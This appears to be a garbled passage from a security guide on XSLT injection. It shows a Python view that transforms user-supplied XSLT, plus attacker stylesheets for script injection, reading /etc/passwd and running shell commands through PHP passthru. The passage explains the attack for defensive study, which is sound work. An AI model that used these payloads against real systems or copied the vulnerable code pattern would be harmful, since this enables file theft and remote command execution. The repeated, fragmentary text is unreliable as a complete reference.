<xsl:copy-of select="document('/etc/passwd')"/>
</xsl:template>
</xsl:stylesheet>
/etc/passwd file.
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/">
<xsl:value-of select="php:function('passthru','ls -la')"/>
</xsl:template>
</xsl:stylesheet>
...
xml = StringIO.StringIO(request.POST['xml'])
xslt = StringIO.StringIO(request.POST['xslt'])
xslt_root = etree.XML(xslt)
transform = etree.XSLT(xslt_root)
result_tree = transform(xml)
return render_to_response(template_name, {'result': etree.tostring(result_tree)})
...
Example 1 results in three different exploits when the attacker passes the identified XSL to the XSTL processor:
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<script>alert(123)</script>
</xsl:template>
</xsl:stylesheet>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:copy-of select="document('/etc/passwd')"/>
</xsl:template>
</xsl:stylesheet>
/etc/passwd file.